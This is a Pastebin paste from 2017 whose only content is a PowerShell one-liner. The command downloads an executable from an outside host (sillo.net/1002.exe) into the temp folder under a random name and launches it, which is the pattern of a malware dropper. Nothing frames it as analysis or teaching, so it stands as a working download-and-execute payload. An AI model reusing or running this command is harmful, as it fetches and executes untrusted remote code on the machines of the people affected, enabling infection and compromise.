Advertisement
Guest User

Untitled

a guest
Apr 7th, 2017
126
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.34 KB | None | 0 0
  1. powershell $webclient = new-object system.net.webclient;$random = new-object random;$urls = 'http://sillo.net/1002.exe'.split(',');$name = $random.next(1, 65536);$path = $env:temp + '\\' + $name + '.exe';foreach($url in $urls){try{$webclient.downloadfile($url.tostring(), $path);start-process $path;break;}catch{write-host $_.exception.message;}}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement